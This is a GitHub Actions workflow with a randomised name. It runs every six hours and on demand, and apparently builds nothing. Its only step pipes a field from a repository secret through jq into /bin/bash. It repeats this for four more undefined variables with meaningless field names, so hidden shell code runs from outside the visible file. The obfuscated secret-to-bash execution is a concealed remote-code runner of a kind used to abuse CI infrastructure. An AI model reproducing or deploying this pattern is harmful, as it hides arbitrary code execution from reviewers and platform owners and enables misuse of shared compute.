name: shangdongpeng4637

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shangdongpeng4637
        env:
          yod4: ${{ secrets.yod4 }}
        run: |
          echo $yod4 | jq -r .c2437 | /bin/bash
          echo $gl654 | jq -r .by6954 | /bin/bash
          echo $pfij9409 | jq -r .gvnhx129 | /bin/bash
          echo $zkh0 | jq -r .inke4324 | /bin/bash
          echo $uadfe92 | jq -r .e48 | /bin/bash

